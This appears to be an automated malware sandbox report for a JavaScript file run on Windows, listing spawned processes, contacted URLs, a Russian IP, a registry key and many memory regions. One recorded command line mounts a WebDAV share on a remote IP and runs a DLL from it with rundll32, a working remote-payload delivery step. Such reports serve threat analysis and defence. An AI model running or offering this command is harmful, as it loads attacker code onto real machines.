Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\25827193901296915716.js"
|
 |
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\65181732216695.dll,Entry
|
|
|
|
C:\Windows\System32\net.exe
|
net use \\94.159.113.82@8888\davwwwroot\
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32 \\94.159.113.82@8888\davwwwroot\65181732216695.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://94.159.113.82:8888/temS.
|
unknown
|
||
|
http://94.159.113.82:8888/4
|
unknown
|
||
|
http://94.159.113.82:8888/
|
unknown
|
||
|
http://94.159.113.82:8888/D:
|
unknown
|
||
|
http://94.159.113.82:8888/c
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.82
|
unknown
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
253F8645000
|
heap
|
page read and write
|
||
|
253FA350000
|
heap
|
page read and write
|
||
|
253F859C000
|
heap
|
page read and write
|
||
|
253FA331000
|
heap
|
page read and write
|
||
|
253FA31F000
|
heap
|
page read and write
|
||
|
253FA337000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
253FA32C000
|
heap
|
page read and write
|
||
|
253F8638000
|
heap
|
page read and write
|
||
|
253FAD69000
|
heap
|
page read and write
|
||
|
20AA04D0000
|
remote allocation
|
page read and write
|
||
|
20AA0480000
|
heap
|
page read and write
|
||
|
253FA324000
|
heap
|
page read and write
|
||
|
253F8510000
|
heap
|
page read and write
|
||
|
253F85E9000
|
heap
|
page read and write
|
||
|
1BAE7C05000
|
heap
|
page read and write
|
||
|
253F862C000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
20AA0531000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
253FA33F000
|
heap
|
page read and write
|
||
|
253FA36F000
|
heap
|
page read and write
|
||
|
253FA370000
|
heap
|
page read and write
|
||
|
1BAE7C00000
|
heap
|
page read and write
|
||
|
253FA36F000
|
heap
|
page read and write
|
||
|
253FA30A000
|
heap
|
page read and write
|
||
|
1BAEAE60000
|
heap
|
page read and write
|
||
|
253F8617000
|
heap
|
page read and write
|
||
|
253FA30A000
|
heap
|
page read and write
|
||
|
253FA361000
|
heap
|
page read and write
|
||
|
1BAE7CA3000
|
heap
|
page read and write
|
||
|
253F859C000
|
heap
|
page read and write
|
||
|
253FA31E000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
253F859A000
|
heap
|
page read and write
|
||
|
F5BDCFF000
|
stack
|
page read and write
|
||
|
253FA2F7000
|
heap
|
page read and write
|
||
|
253FA30F000
|
heap
|
page read and write
|
||
|
F5BE1FB000
|
stack
|
page read and write
|
||
|
253FA307000
|
heap
|
page read and write
|
||
|
20AA056A000
|
heap
|
page read and write
|
||
|
253F84F0000
|
heap
|
page read and write
|
||
|
253FA37E000
|
heap
|
page read and write
|
||
|
253FA324000
|
heap
|
page read and write
|
||
|
253FA319000
|
heap
|
page read and write
|
||
|
20AA0558000
|
heap
|
page read and write
|
||
|
253F859E000
|
heap
|
page read and write
|
||
|
253FA310000
|
heap
|
page read and write
|
||
|
783307E000
|
stack
|
page read and write
|
||
|
20AA0526000
|
heap
|
page read and write
|
||
|
253FA2F2000
|
heap
|
page read and write
|
||
|
253F862B000
|
heap
|
page read and write
|
||
|
253F9EB0000
|
heap
|
page read and write
|
||
|
253F8645000
|
heap
|
page read and write
|
||
|
253F8619000
|
heap
|
page read and write
|
||
|
20AA0531000
|
heap
|
page read and write
|
||
|
253FA2F4000
|
heap
|
page read and write
|
||
|
253FA30B000
|
heap
|
page read and write
|
||
|
253FA347000
|
heap
|
page read and write
|
||
|
1BAEB3A0000
|
trusted library allocation
|
page read and write
|
||
|
253FA30A000
|
heap
|
page read and write
|
||
|
253FA311000
|
heap
|
page read and write
|
||
|
253F85C0000
|
heap
|
page read and write
|
||
|
253F862E000
|
heap
|
page read and write
|
||
|
253FA36D000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
253FA36F000
|
heap
|
page read and write
|
||
|
253FA378000
|
heap
|
page read and write
|
||
|
253F8595000
|
heap
|
page read and write
|
||
|
253FA36F000
|
heap
|
page read and write
|
||
|
253FA301000
|
heap
|
page read and write
|
||
|
1BAE7C0B000
|
heap
|
page read and write
|
||
|
253FA35C000
|
heap
|
page read and write
|
||
|
253F8637000
|
heap
|
page read and write
|
||
|
253FA350000
|
heap
|
page read and write
|
||
|
253FA36F000
|
heap
|
page read and write
|
||
|
253F8620000
|
heap
|
page read and write
|
||
|
253FA317000
|
heap
|
page read and write
|
||
|
253F859B000
|
heap
|
page read and write
|
||
|
253FA6EA000
|
heap
|
page read and write
|
||
|
253FA30A000
|
heap
|
page read and write
|
||
|
253FA304000
|
heap
|
page read and write
|
||
|
253FA321000
|
heap
|
page read and write
|
||
|
20AA0460000
|
heap
|
page read and write
|
||
|
253F85EA000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
253FA304000
|
heap
|
page read and write
|
||
|
1BAE7CA9000
|
heap
|
page read and write
|
||
|
253FA2F1000
|
heap
|
page read and write
|
||
|
1BAEAE63000
|
heap
|
page read and write
|
||
|
253FA37D000
|
heap
|
page read and write
|
||
|
253F8629000
|
heap
|
page read and write
|
||
|
253FA2FB000
|
heap
|
page read and write
|
||
|
253FA345000
|
heap
|
page read and write
|
||
|
253FA378000
|
heap
|
page read and write
|
||
|
253FA6EC000
|
heap
|
page read and write
|
||
|
253FA30A000
|
heap
|
page read and write
|
||
|
253FA31E000
|
heap
|
page read and write
|
||
|
253FA445000
|
heap
|
page read and write
|
||
|
F5BDEFE000
|
stack
|
page read and write
|
||
|
253FA381000
|
heap
|
page read and write
|
||
|
253FA2FF000
|
heap
|
page read and write
|
||
|
F5BDDFE000
|
stack
|
page read and write
|
||
|
253FA378000
|
heap
|
page read and write
|
||
|
253F8410000
|
heap
|
page read and write
|
||
|
F5BDFFD000
|
stack
|
page read and write
|
||
|
1BAE7C89000
|
heap
|
page read and write
|
||
|
20AA056A000
|
heap
|
page read and write
|
||
|
253FA2F3000
|
heap
|
page read and write
|
||
|
20AA0533000
|
heap
|
page read and write
|
||
|
253FA383000
|
heap
|
page read and write
|
||
|
20AA0564000
|
heap
|
page read and write
|
||
|
253FA378000
|
heap
|
page read and write
|
||
|
20AA07C0000
|
heap
|
page read and write
|
||
|
253FA2F0000
|
heap
|
page read and write
|
||
|
20AA0552000
|
heap
|
page read and write
|
||
|
253FA30A000
|
heap
|
page read and write
|
||
|
253F8628000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
253FA30A000
|
heap
|
page read and write
|
||
|
686F27E000
|
stack
|
page read and write
|
||
|
1BAE7C93000
|
heap
|
page read and write
|
||
|
1BAE7C9E000
|
heap
|
page read and write
|
||
|
253F859C000
|
heap
|
page read and write
|
||
|
F5BD509000
|
stack
|
page read and write
|
||
|
1BAE9650000
|
heap
|
page read and write
|
||
|
686F37C000
|
stack
|
page read and write
|
||
|
253FA310000
|
heap
|
page read and write
|
||
|
20AA052A000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
20AA0508000
|
heap
|
page read and write
|
||
|
20AA04D0000
|
remote allocation
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
20AA0380000
|
heap
|
page read and write
|
||
|
20AA04D0000
|
remote allocation
|
page read and write
|
||
|
253F8645000
|
heap
|
page read and write
|
||
|
253FA305000
|
heap
|
page read and write
|
||
|
253FA36F000
|
heap
|
page read and write
|
||
|
20AA055A000
|
heap
|
page read and write
|
||
|
253FA32C000
|
heap
|
page read and write
|
||
|
F5BDBFF000
|
stack
|
page read and write
|
||
|
1BAE7AA0000
|
heap
|
page read and write
|
||
|
253FA31E000
|
heap
|
page read and write
|
||
|
253FA36F000
|
heap
|
page read and write
|
||
|
253FA32F000
|
heap
|
page read and write
|
||
|
253FA327000
|
heap
|
page read and write
|
||
|
686EF9B000
|
stack
|
page read and write
|
||
|
253F859A000
|
heap
|
page read and write
|
||
|
253FA30D000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
20AA0538000
|
heap
|
page read and write
|
||
|
253FA367000
|
heap
|
page read and write
|
||
|
253FA318000
|
heap
|
page read and write
|
||
|
1BAE7CA9000
|
heap
|
page read and write
|
||
|
1BAE7BA0000
|
heap
|
page read and write
|
||
|
253FA309000
|
heap
|
page read and write
|
||
|
F5BD8FE000
|
stack
|
page read and write
|
||
|
253FA350000
|
heap
|
page read and write
|
||
|
253FA318000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
253F8645000
|
heap
|
page read and write
|
||
|
253FAAE7000
|
heap
|
page read and write
|
||
|
1BAE7CB0000
|
heap
|
page read and write
|
||
|
1BAE7C78000
|
heap
|
page read and write
|
||
|
F5BD9FE000
|
stack
|
page read and write
|
||
|
20AA0538000
|
heap
|
page read and write
|
||
|
1BAE7B80000
|
heap
|
page read and write
|
||
|
253FA378000
|
heap
|
page read and write
|
||
|
253FA339000
|
heap
|
page read and write
|
||
|
253FA368000
|
heap
|
page read and write
|
||
|
253FA34D000
|
heap
|
page read and write
|
||
|
253F8623000
|
heap
|
page read and write
|
||
|
7832DAD000
|
stack
|
page read and write
|
||
|
253FA989000
|
heap
|
page read and write
|
||
|
20AA07C5000
|
heap
|
page read and write
|
||
|
7832D2E000
|
stack
|
page read and write
|
||
|
253FA36F000
|
heap
|
page read and write
|
||
|
253FA2F7000
|
heap
|
page read and write
|
||
|
253FA2F2000
|
heap
|
page read and write
|
||
|
253FA36F000
|
heap
|
page read and write
|
||
|
253FA36F000
|
heap
|
page read and write
|
||
|
20AA0531000
|
heap
|
page read and write
|
||
|
253F8590000
|
heap
|
page read and write
|
||
|
20AA0564000
|
heap
|
page read and write
|
||
|
20AA0552000
|
heap
|
page read and write
|
||
|
7832CAA000
|
stack
|
page read and write
|
||
|
253FA2FC000
|
heap
|
page read and write
|
||
|
253FA378000
|
heap
|
page read and write
|
||
|
20AA0500000
|
heap
|
page read and write
|
||
|
1BAE7C97000
|
heap
|
page read and write
|
||
|
253FA329000
|
heap
|
page read and write
|
||
|
1BAE7C8D000
|
heap
|
page read and write
|
||
|
686F3FE000
|
stack
|
page read and write
|
||
|
1BAE7C70000
|
heap
|
page read and write
|
||
|
253F862D000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
253FA303000
|
heap
|
page read and write
|
||
|
78330FF000
|
stack
|
page read and write
|
||
|
253FA84A000
|
heap
|
page read and write
|
||
|
253FA2FB000
|
heap
|
page read and write
|
||
|
1BAE7C40000
|
heap
|
page read and write
|
||
|
253FA355000
|
heap
|
page read and write
|
||
|
20AA052A000
|
heap
|
page read and write
|
||
|
253FA36F000
|
heap
|
page read and write
|
||
|
686F2FF000
|
stack
|
page read and write
|
||
|
1BAE7C86000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
253FA340000
|
heap
|
page read and write
|
||
|
20AA0531000
|
heap
|
page read and write
|
||
|
1BAE7CA9000
|
heap
|
page read and write
|
There are 200 hidden memdumps, click here to show them.